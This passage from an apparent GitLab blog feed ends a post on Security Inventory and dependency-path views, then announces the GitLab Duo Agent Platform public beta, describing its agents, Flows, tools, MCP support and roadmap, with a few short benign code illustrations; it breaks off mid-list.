<p>Security Inventory consolidates risk information across all your groups and projects into a unified view. It highlights which assets are covered by security scans and which aren't. Rather than managing issues in isolation, security teams can assess posture holistically and identify where to focus efforts.</p>
<p>This level of centralization is especially critical for organizations managing a large number of repositories. It not only allows platform and AppSec teams to understand where risk exists by highlighting unscanned or underprotected projects, but also enables them to take action directly from the interface. Teams can go beyond awareness to enforcement, with full context and an understanding of which applications pose the greatest risk. By turning fragmented insights into a single source of truth, Security Inventory enables organizations to move from reactive issue triage to strategic, data-driven security governance.
<img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1753101068/qhujktnbkhl2rzgqfead.png" alt="Security Inventory display">
Learn more by watching Security Inventory in action:
&lt;figure class=&quot;video_container&quot;&gt; &lt;iframe src=&quot;https://www.youtube.com/embed/yqo6aJLS9Fw?si=CtYmsF-PLN1UKt83&quot; frameborder=&quot;0&quot; allowfullscreen=&quot;true&quot;&gt; &lt;/iframe&gt; &lt;/figure&gt;</p>
<h2>Dependency Path visualization: Clarity for effective remediation</h2>
<p>Security Inventory shows where the risks are at a high level; Dependency Path visualization shows how to fix them.</p>
<p>When a vulnerability is discovered deep in a dependency chain, identifying the correct fix can be complicated. Most security tools will highlight the affected package but stop short of explaining how it entered the codebase. Developers are left guessing which dependencies are directly introduced and which are pulled in transitively, making it difficult to determine where a change is needed or, worse, leading them to apply patches that don't address the root cause.</p>
<p>Our new Dependency Path visualization, sometimes referred to as a dependency graph, displays the full route from a top-level package to the vulnerable component following an SCA scan. This clarity is essential, especially given how pervasive deeply embedded vulnerabilities are in dependency chains. And since it's built into the GitLab workflow, developers gain actionable insight without context switching or guesswork. Security teams can more effectively triage issues while developers get assurance that remediations are addressing root causes.
<img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1753101069/kf5ym62gylm5ck6iebjk.png" alt="Dependency path visualization"></p>
<h2>Mitigate risk with developer-first security</h2>
<p>These capabilities are part of GitLab's broader strategy to deliver security within the same platform where code is planned, built, and deployed. By embedding security insights into the DevSecOps workflow, GitLab reduces friction and drives collaboration between development and security teams.</p>
<p>Security Inventory and Dependency Path visualization provide complementary perspectives: the former enables scale-aware oversight, the latter supports precision fixes. This alignment helps teams prioritize what matters most and close gaps without adding new tools or complex integrations.</p>
<blockquote>
<p>Get started with Security Inventory and Dependency Path visualization today! Sign up for a <a href="https://about.gitlab.com/free-trial/">free trial of GitLab Ultimate</a>.</p>
</blockquote>
<h2>Read more</h2>
<ul>
<li>
<p><a href="https://about.gitlab.com/releases/2025/07/17/gitlab-18-2-released/">GitLab 18.2 released</a></p>
</li>
<li>
<p><a href="https://about.gitlab.com/solutions/security-compliance/">GitLab security solutions</a></p>
</li>
<li>
<p><a href="https://about.gitlab.com/the-source/security/field-guide-to-threat-vectors-in-the-software-supply-chain/">A field guide to threat vectors in the software supply chain</a></p>
</li>
</ul>
]]></content>
        <author>
            <name>Salman Ladha</name>
            <uri>https://about.gitlab.com/blog/authors/salman-ladha</uri>
        </author>
        <published>2025-07-21T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[GitLab Duo Agent Platform Public Beta: Next-gen AI orchestration and more]]></title>
        <id>https://about.gitlab.com/blog/gitlab-duo-agent-platform-public-beta/</id>
        <link href="https://about.gitlab.com/blog/gitlab-duo-agent-platform-public-beta/"/>
        <updated>2025-07-17T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p><strong>We're building the future of software development.</strong></p>
<p>At GitLab, we are <a href="https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/">reimagining the future of software engineering</a> as a collaboration between humans and AI: developers focus on solving complex technical problems and driving innovation, while AI agents handle the routine, repetitive tasks that slow down progress. Developers are free to explore new ideas in code at much lower cost, bug backlogs are a thing of the past, and users of the software you build enjoy a more usable, reliable, and secure experience. This isn't a distant dream. We're building this reality today, and it is called the GitLab Duo Agent Platform.</p>
<h2>What is GitLab Duo Agent Platform?</h2>
<p>GitLab Duo Agent Platform is our next-generation DevSecOps orchestration platform designed to unlock asynchronous collaboration between developers and AI agents. It will transform your development workflow from isolated linear processes into dynamic collaboration where specialized AI agents work alongside you and your team on every stage of the software development lifecycle; it will be like having an unlimited team of colleagues at your disposal.</p>
<p>Imagine delegating a complex refactoring task to a Software Developer Agent while simultaneously having a Security Analyst Agent scan for vulnerabilities and a Deep Research Agent analyze progress across your repository history. This all happens in parallel, orchestrated seamlessly within GitLab.</p>
<p>Today, we are announcing the launch of the <a href="https://about.gitlab.com/gitlab-duo/agent-platform/">first public beta of the GitLab Duo Agent Platform</a> for GitLab.com and self-managed GitLab Premium and Ultimate customers. This is just the first in a series of updates that will improve how software gets planned, built, verified, and deployed as we amplify human ingenuity through intelligent automation.</p>
<p>This first beta focuses on unlocking the IDE experience through the GitLab VS Code extension and JetBrains IDEs plug-in; next month, we plan on bringing the Duo Agent Platform experience to the GitLab application and expanding our IDE support. Let me share a bit more about our vision for the roadmap between now and general availability, planned for later this year. You can find details about the first beta below.</p>
<p>Watch this video or read on for what's available now and what's to come. Then, if you're ready to get started with Duo Agent Platform, <a href="#get-started-now">find out how with the public beta</a>.</p>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1101993507?title=0&amp;byline=0&amp;portrait=0&amp;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; referrerpolicy=&quot;strict-origin-when-cross-origin&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;GitLab Agent Platform Beta Launch_071625_MP_v2&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;</p>
<h2>GitLab's unique position as an orchestration platform</h2>
<p>GitLab sits at the heart of the development lifecycle as the system of record for engineering teams, orchestrating the entire journey from concept to production for over 50 million registered users, including half of the Fortune 500 across geographies. This includes over 10,000 paying customers across all segments and verticals, including public institutions.</p>
<p>This gives GitLab something no competitor can match: a comprehensive understanding of everything it takes to deliver software. We bring together your project plans, code, test runs, security scans, compliance checks, and CI/CD configurations to not only power your team but also orchestrate collaboration with AI agents you control.</p>
<p>As an intelligent, unified DevSecOps platform, GitLab stores all of the context about your software engineering practice in one place. We will expose this unified data to AI agents via our knowledge graph. Every agent we build has automatic access to this SDLC-connected data set, providing rich context so agents can make informed recommendations and take actions that adhere to your organizational standards.</p>
<p><strong>Here's an example of this advantage in action.</strong> Have you ever tried to figure out exactly how a project is going across dozens, if not hundreds, of stories and issues being worked on across all the developers involved? Our Deep Research Agent leverages the GitLab Knowledge Graph and semantic search capabilities to traverse your epic and all related issues, and explore the related codebase and surrounding context. It quickly correlates information across your repositories, merge requests, and deployment history. This delivers critical insights that standalone tools can't match and that would take human developers hours to uncover.</p>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1101998114?title=0&amp;byline=0&amp;portrait=0&amp;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; referrerpolicy=&quot;strict-origin-when-cross-origin&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;Deep Research Demo_071625_MP_v1&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;</p>
<h2>Our strategic evolution from AI features to agent orchestration</h2>
<p>GitLab Duo started as an add-on, bringing generative AI to developers through Duo Pro and Enterprise. With GitLab 18.0, it's now built into the platform. We've unlocked <a href="https://about.gitlab.com/blog/gitlab-duo-chat-gets-agentic-ai-makeover/">Duo Agentic Chat</a> and Code Suggestions for all Premium and Ultimate users, and now we're providing immediate access to the Duo Agent Platform.</p>
<p>We've ramped up engineering investment and are accelerating delivery, with powerful new AI features landing every month. But we're not just building another coding assistant. GitLab Duo is becoming an agent orchestration platform, where you can create, customize, and deploy AI agents that work alongside you and interoperate easily with other systems, dramatically increasing productivity.</p>
<blockquote>
<p><strong>“GitLab Duo Agent Platform enhances our development workflow with AI that truly understands our codebase and our organization. Having GitLab Duo AI agents embedded in our system of record for code, tests, CI/CD, and the entire software development lifecycle boosts productivity, velocity, and efficiency. The agents have become true collaborators to our teams, and their ability to understand intent, break down problems, and take action frees our developers to tackle the exciting, innovative work they love.”</strong> - Bal Kang, Engineering Platform Lead at NatWest</p>
</blockquote>
<h3>Agents that work out of the box</h3>
<p>We are introducing agents that mirror familiar team roles. These agents can search, read, create, and modify existing artifacts across GitLab. Think of these as agents you can interact with individually, that also act as building blocks that you can customize to create your own agents. Like your team members, agents have defined specializations, such as software development, testing, or technical writing. As specialists, they're tapping into the right context and tools to consistently accomplish the same types of tasks, wherever they're deployed.</p>
<p>Here are some of the agents we're building today:</p>
<ul>
<li><strong>Chat Agent (now in beta):</strong> Takes natural language requests to provide information and context to the user. Can perform general development tasks, such as reading issues or code diffs. As an example, you can ask Chat to debug a failed job by providing the job URL.</li>
</ul>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1102616311?badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; referrerpolicy=&quot;strict-origin-when-cross-origin&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;agentic-chat-in-web-ui-demo_Update V2&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;&lt;p&gt;&lt;/p&gt;</p>
<ul>
<li>
<p><strong>Software Developer Agent (now in beta):</strong> Works on assigned items by creating code changes in virtual development environments and opening merge requests for review.</p>
</li>
<li>
<p><strong>Product Planning Agent:</strong> Prioritizes product backlogs, assigns work items to human and agentic team members, and provides project updates over specified timelines.</p>
</li>
<li>
<p><strong>Software Test Engineer Agent:</strong> Tests new code contributions for bugs and validates if reported issues have been resolved.</p>
</li>
<li>
<p><strong>Code Reviewer Agent:</strong> Performs code reviews following team standards, identifies quality and security issues, and can merge code when ready.</p>
</li>
<li>
<p><strong>Platform Engineer Agent:</strong> Monitors GitLab deployments, including GitLab Runners, tracks CI/CD pipeline health, and reports performance issues to human platform engineering teams.</p>
</li>
<li>
<p><strong>Security Analyst Agent:</strong> Finds vulnerabilities within codebases and deployed applications, and implements code and configuration changes to help resolve security weaknesses.</p>
</li>
<li>
<p><strong>Deployment Engineer Agent:</strong> Deploys updates to production, monitors for unusual behavior, and rolls back changes that impact application performance or security.</p>
</li>
<li>
<p><strong>Deep Research Agent:</strong> Conducts comprehensive, multi-source analysis across your entire development ecosystem.</p>
</li>
</ul>
<p>What makes these agents powerful is their native access to GitLab's comprehensive toolkit. Today, we have over 25 tools, from issues and epics to merge requests and documentation, with more to come. Unlike external AI tools that operate with limited context, our agents work as true team members with full platform privileges under your supervision.</p>
<p>In the coming months, you'll also be able to modify these agents to meet the needs of your organization. For example, you'll be able to specify that a Software Test Engineer Agent follows best practices for a particular framework or methodology, deepening its specialization and turning it into an even more valuable team member.</p>
<h2>Flows orchestrate complex agent tasks</h2>
<p>On top of individual agents, we are introducing agent Flows. Think of these as more complex workflows that can include multiple agents with pre-built instructions, steps, and actions for a given task that can run autonomously.</p>
<p>While you can create Flows for basic tasks common to individuals, they truly excel when applied to complex, specialized tasks that would normally take hours of coordination and effort to complete. Flows will help you finish complex tasks faster and, in many cases, asynchronously without human intervention.</p>
<p>Flows have specific triggers for execution. Each Flow contains a series of steps, and each step has detailed instructions that tell a specialized agent what to do. This granular approach allows you to give precise instructions to each agent in the Flow. By defining instructions in greater detail and establishing structured decision points, Flows help manage the inherent variability in AI responses while eliminating the need to repeatedly specify the same requirements, unlocking more consistent and predictable outcomes without extra user configuration.</p>
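<p>The trigger-steps-instructions structure described above can be sketched as a toy data model. The field names, agents, and executor below are invented for illustration and are not GitLab's actual schema:</p>

```python
from dataclasses import dataclass, field

@dataclass
class Step:
    agent: str          # which specialized agent runs this step
    instructions: str   # detailed, pre-written instructions for the agent

@dataclass
class Flow:
    trigger: str                  # event that starts the flow
    steps: list = field(default_factory=list)

    def run(self, event, execute):
        """Run each step in order when the event matches the trigger."""
        if event != self.trigger:
            return []
        return [execute(step.agent, step.instructions) for step in self.steps]

flow = Flow(
    trigger="issue_created",
    steps=[
        Step("planner", "Break the issue into implementation tasks"),
        Step("developer", "Implement the tasks and open a merge request"),
        Step("tester", "Verify the merge request resolves the issue"),
    ],
)

# Stub executor: a real platform would dispatch to the named agent.
results = flow.run("issue_created", lambda agent, text: f"{agent}: done")
print(results)  # ['planner: done', 'developer: done', 'tester: done']
```

<p>Because the instructions live in the Flow definition rather than in each chat prompt, every run of the Flow starts from the same structured plan.</p>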
<p>Here are some examples of out-of-the-box Flows that we are building:</p>
<ul>
<li>
<p><strong>Software Development Flow (now in beta):</strong> Orchestrates multiple agents to plan, implement, and test code changes end-to-end, helping transform how teams deliver features from concept to production.</p>
</li>
<li>
<p><strong>Issue-to-MR Flow:</strong> Automatically converts issues into actionable merge requests by coordinating agents to analyze requirements, prepare comprehensive implementation plans, and generate code.</p>
</li>
<li>
<p><strong>Convert CI File Flow:</strong> Streamlines migration workflows by having agents analyze existing CI/CD configurations and intelligently convert them to GitLab CI format with full pipeline compatibility.</p>
</li>
</ul>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1101941425?title=0&amp;byline=0&amp;portrait=0&amp;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; referrerpolicy=&quot;strict-origin-when-cross-origin&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;jenkins-to-gitlab-cicd-for-blog&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;
&lt;p&gt;&lt;/p&gt;</p>
<ul>
<li>
<p><strong>Search and Replace Flow:</strong> Discovers and transforms code patterns across codebases by systematically analyzing project structures, identifying optimization opportunities, and executing precise replacements.</p>
</li>
<li>
<p><strong>Incident Response &amp; Root Cause Analysis Flow:</strong> Orchestrates incident response by correlating system data, coordinating specialized agents for root cause analysis, and executing approved remediation steps while keeping human stakeholders informed throughout the resolution process.</p>
</li>
</ul>
<p>This is where GitLab Duo Agent Platform is taking a truly unique approach versus other AI solutions. We won't just give you pre-built agents. We'll also give you the power to create, customize, and share agent Flows that match your individual and organizational needs. And with Flows, you will be able to give agents a specific execution plan for common and complex tasks.</p>
<p>We believe this approach is more powerful than building purpose-built agents like our competitors do, because every organization has different workflows, coding standards, security requirements, and business logic. Generic AI tools can't understand your specific context, but GitLab Duo Agent Platform will be able to be tailored to work exactly how your team works.</p>
<h2>Why build agents and agent Flows in the GitLab Duo Agent Platform?</h2>
<p><strong>Build fast.</strong> You can build agents and complex agent Flows in the Duo Agent Platform quickly and easily using a fast, declarative extensibility model and UI assistance.</p>
<p><strong>Built-in compute.</strong> With Duo Agent Platform, you no longer have to worry about the hassle of standing up your own infrastructure for agents: compute, network, and storage are all built-in.</p>
<p><strong>SDLC events.</strong> Your agents can be invoked automatically on common events: broken pipeline, failed deployment, issue created, etc.</p>
<p><strong>Instant access.</strong> You can interact with your agents everywhere in GitLab or our IDE plug-in: assign them issues, @mention them in comments, and chat with them everywhere Duo Chat is available.</p>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1102029239?badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; referrerpolicy=&quot;strict-origin-when-cross-origin&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;assigning an agent an issue&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt; &lt;p&gt;&lt;/p&gt;</p>
<p><strong>Built-in and custom models supported.</strong> Your agents will have automatic access to all of the models we support, and users will be able to choose specific models for specific tasks. If you want to connect Duo Agent Platform to your own self-hosted model, you will be able to do that too!</p>
<p><strong>Model Context Protocol (MCP) endpoints.</strong> Every agent and Flow can be accessed or triggered via native MCP endpoints, allowing you to connect to and collaborate with your agents and Flows from anywhere, including popular tools like Claude Code, Cursor, Copilot, and Windsurf.</p>
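<p>MCP messages use JSON-RPC 2.0 framing, so an external client invoking one of these endpoints essentially sends a <code>tools/call</code> request. The sketch below builds such a request in Python; the tool name and arguments are hypothetical, and the exact schema GitLab's endpoints will expose may differ.</p>

```python
import json

def mcp_tool_call(request_id, tool_name, arguments):
    """Build an MCP tools/call request (MCP uses JSON-RPC 2.0 framing)."""
    return {
        "jsonrpc": "2.0",
        "id": request_id,
        "method": "tools/call",
        "params": {"name": tool_name, "arguments": arguments},
    }

# Hypothetical: ask an exposed review flow to look at a merge request.
req = mcp_tool_call(1, "code_review_flow", {"merge_request_iid": 42})
print(json.dumps(req, indent=2))
```

<p>Any MCP-capable client that can send this kind of request, from Claude Code to Cursor, could then drive the same agents and Flows you use inside GitLab.</p>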
<p><strong>Observability and security.</strong> Finally, we provide built-in observability and usage dashboards, so you can see exactly who, where, what, and when agents took actions on your behalf.</p>
<h2>A community-driven future</h2>
<p>Community contributions have long fueled GitLab's innovation and software development. We're excited to partner with our community through the introduction of the AI Catalog. In our upcoming beta, the AI Catalog will allow you to create and share agents and Flows within your organization and across the GitLab ecosystem.</p>
<p>We believe the most valuable AI applications are likely to emerge from you, our community, through your daily use of GitLab Duo Agent Platform to solve real-world problems. By enabling seamless sharing of agents and Flows, we're creating a network effect where each contribution enhances the platform's collective intelligence and value.</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752685501/awdwx08udwrxgvcpmssb.png" alt="AI Catalog" title="AI Catalog"></p>
<h2>Available today in the GitLab Duo Agent Platform in public beta</h2>
<p>The GitLab Duo Agent Platform public beta is available now to Premium and Ultimate customers with these capabilities:</p>
<p><strong>Software Development Flow:</strong> Our first Flow orchestrates agents in gathering comprehensive context, clarifying ambiguities with human developers, and executing strategic plans to make precise changes to your codebase and repository. It leverages your entire project, including its structure, codebase, and history, along with additional context like GitLab issues or merge requests to amplify developer productivity.</p>
<p><strong>New Agent tools available:</strong> Agents now have access to multiple tools to do their work, including:</p>
<ul>
<li>File System (Read, Create, Edit, Find Files, List, Grep)</li>
<li>Execute Command Line*</li>
<li>Issues (List, Get, Get Comments, Edit*, Create*, Add/Update Comments*)</li>
<li>Epics (Get, Get Comments)</li>
<li>MR (Get, Get Comments, Get Diff, Create, Update)</li>
<li>Pipeline (Job Logs, Pipeline Errors)</li>
<li>Project (Get, Get File)</li>
<li>Commits (Get, List, Get Comments, Get Diff)</li>
<li>Search (Issue Search)</li>
<li>Secure (List Vulnerabilities)</li>
<li>Documentation Search</li>
</ul>
<p>*=Requires user approval</p>
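<p>The approval requirement on the starred tools reflects a common agent-safety pattern: read-only tools run freely, while tools with side effects consult a human before executing. A minimal illustrative sketch follows; the tool names, actions, and callback here are invented for illustration, not GitLab's implementation:</p>

```python
def run_tool(name, action, requires_approval, approve):
    """Execute a tool, first asking the user when the tool is gated."""
    if requires_approval and not approve(name):
        return f"{name}: skipped (user declined)"
    return f"{name}: {action()}"

TOOLS = {
    # name: (action, requires_approval) — mirrors the *-marked list above
    "read_file": (lambda: "contents", False),
    "execute_command": (lambda: "ran", True),
    "create_issue": (lambda: "created", True),
}

# Deny every gated tool: only the safe read-only call goes through.
results = [
    run_tool(name, action, gated, approve=lambda n: False)
    for name, (action, gated) in TOOLS.items()
]
print(results)
# ['read_file: contents', 'execute_command: skipped (user declined)',
#  'create_issue: skipped (user declined)']
```

<p>The gate keeps destructive operations under human supervision while letting the agent gather context without interruption.</p>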
<p><strong>GitLab Duo Agentic Chat in the IDE:</strong> Duo Agentic Chat transforms the chat experience from a passive Q&amp;A tool into an active development partner directly in your IDE.</p>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1103237126?badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; referrerpolicy=&quot;strict-origin-when-cross-origin&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;agentic-ai-launch-video_NEW&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;&lt;p&gt;&lt;/p&gt;</p>
<ul>
<li><strong>Iterative feedback and chat history:</strong> Duo Agentic Chat now supports chat history and iterative feedback, transforming the agent into a stateful, conversational partner. This fosters trust, enabling developers to delegate more complex tasks and offer corrective guidance.</li>
</ul>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1101743173?title=0&amp;byline=0&amp;portrait=0&amp;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;agentic-chat-history&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;
&lt;p&gt;&lt;/p&gt;</p>
<ul>
<li><strong>Streamlined delegation with slash commands:</strong> Expanded, more powerful slash commands, such as /explain, /tests, and /include, create a “delegation language” for quick and precise intent. The /include command allows the explicit injection of context from specific files, open issues, merge requests, or dependencies directly into the agent's working memory, making the agent more powerful and teaching users how to provide optimal context for high-quality responses.</li>
</ul>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1101743187?title=0&amp;byline=0&amp;portrait=0&amp;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;include-agentic-chat-jc-voiceover&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;
&lt;p&gt;&lt;/p&gt;</p>
<ul>
<li><strong>Personalization through custom rules:</strong> New Custom Rules enables developers to tailor agent behavior to individual and team preferences using natural language, for example, development style guides. This foundational mechanism shapes the agent's persona into a personalized assistant, evolving toward specialized agents based on user-defined preferences and organizational policies.</li>
</ul>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1101743179?title=0&amp;byline=0&amp;portrait=0&amp;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;custom-rules-with-jc-voiceover&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;
&lt;p&gt;&lt;/p&gt;</p>
<ul>
<li><strong>Support for GitLab Duo Agentic Chat in JetBrains IDEs:</strong> To help meet developers where they work, we have expanded Duo Agentic Chat support to the JetBrains family of IDEs, including IntelliJ, PyCharm, GoLand, and WebStorm. This adds to our existing support for VS Code. Existing users get agentic capabilities automatically, while new users can install the plugin from the JetBrains Marketplace.</li>
</ul>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1101743193?title=0&amp;byline=0&amp;portrait=0&amp;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;jetbrains-support-jc-voiceover&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;
&lt;p&gt;&lt;/p&gt;</p>
<ul>
<li><strong>MCP client support:</strong> Duo Agentic Chat can now act as an MCP client, connecting to remote and locally running MCP servers. This capability unlocks the agent's ability to connect to systems beyond GitLab, such as Jira, ServiceNow, and Zendesk, to gather context or take actions. Any service that exposes itself via MCP can now become part of the agent's skill set. The official GitLab MCP Server is coming soon!</li>
</ul>
<p>&lt;div style=&quot;padding:56.25% 0 0 0;position:relative;&quot;&gt;&lt;iframe src=&quot;https://player.vimeo.com/video/1101743202?title=0&amp;byline=0&amp;portrait=0&amp;badge=0&amp;autopause=0&amp;player_id=0&amp;app_id=58479&quot; frameborder=&quot;0&quot; allow=&quot;autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share&quot; style=&quot;position:absolute;top:0;left:0;width:100%;height:100%;&quot; title=&quot;McpDemo&quot;&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;script src=&quot;https://player.vimeo.com/api/player.js&quot;&gt;&lt;/script&gt;
&lt;p&gt;&lt;/p&gt;</p>
<ul>
<li><strong>GitLab Duo Agentic Chat in GitLab Web UI:</strong> Duo Agentic Chat is also now available directly within the GitLab Web UI. This pivotal step evolves the agent from a coding assistant to a true DevSecOps agent, as it gains access to rich non-code context, such as issues and merge request discussions, allowing it to understand the &quot;why&quot; behind the work. Beyond understanding context, the agent can make changes directly from the Web UI, such as automatically updating issue statuses or editing merge request descriptions.</li>
</ul>
<h2>Coming soon to GitLab Duo Agent Platform</h2>
<p>Over the coming weeks, we'll release new capabilities to Duo Agent Platform, including more out-of-the-box agents and Flows. These will bring the platform into the GitLab experience you love today and enable even greater customization and extensibility, amplifying productivity for our customers:</p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752685275/hjbe9iiu2ydp9slibsc2.png" alt="GitLab Duo Agent Platform public beta roadmap" title="GitLab Duo Agent Platform public beta roadmap"></p>
<ul>
<li>
<p><strong>Integrated GitLab experience:</strong> Building on the IDE extensions available in 18.2, we're expanding agents and Flows within the GitLab platform. This deeper integration will expand the ways you can collaborate synchronously and asynchronously with agents. You will be able to assign issues directly to agents, @mention them within GitLab Duo Chat, and seamlessly invoke them from anywhere in the application while maintaining MCP connectivity from your developer tool of choice. This native integration transforms agents into true development team members, accessible across GitLab.</p>
</li>
<li>
<p><strong>Agent observability:</strong> As agents become more autonomous, we're building comprehensive visibility into their activity as they progress through Flows, enabling you to monitor their decision-making processes, track execution steps, and understand how they're interpreting and acting on your development challenges. This transparency into agent behavior builds trust and confidence while allowing you to optimize workflows and identify bottlenecks, and helps ensure agents are performing exactly as intended.</p>
</li>
<li>
<p><strong>AI Catalog:</strong> Recognizing that great solutions come from community innovation, we will soon introduce the public beta of our AI Catalog — a marketplace that will allow you to extend Duo Agent Platform with specialized agents and Flows sourced from GitLab, and over time, the broader community. You'll be able to quickly deploy these solutions in GitLab, leveraging context across your projects and codebase.</p>
</li>
<li>
<p><strong>Knowledge Graph:</strong> Leveraging GitLab's unique advantage as the system of record for source code and its surrounding context, we're building a comprehensive Knowledge Graph that not only maps files and dependencies across the codebase but also makes that map navigable for users while accelerating AI query times and helping increase accuracy. This foundation enables GitLab Duo agents to quickly understand relationships across your entire development environment, from code dependencies to deployment patterns, unlocking faster and more precise responses to complex questions.</p>
</li>
</ul>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752685367/n0tvfgorchuhrronic3j.png" alt="GitLab Duo Agent Platform Knowledge Graph" title="GitLab Duo Agent Platform Knowledge Graph"></p>
<ul>
<li><strong>Create and edit agents and Flows:</strong> Understanding that every organization has unique workflows and requirements, we're developing powerful agent and Flow creation and editing capabilities that will be introduced as the AI Catalog matures. You'll be able to create and modify agents and Flows to operate precisely the way your organization works, delivering deep customization across the Duo Agent Platform that enables higher quality results and increased productivity.</li>
</ul>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1752684938/fruwqcqvvrx8gmkz5u0v.png" alt="AI Catalog" title="AI Catalog"></p>
<ul>
<li>
<p><strong>Official GitLab MCP Server:</strong> Recognizing that developers work across multiple tools and environments, we're building an official GitLab MCP server that will enable you to access all of your agents and Flows via MCP. You'll be able to connect to and collaborate with your agents and Flows from anywhere MCP is supported, including popular tools like Claude Code, Cursor, Copilot, and Windsurf, unlocking seamless AI collaboration regardless of your preferred development environment.</p>
</li>
<li>
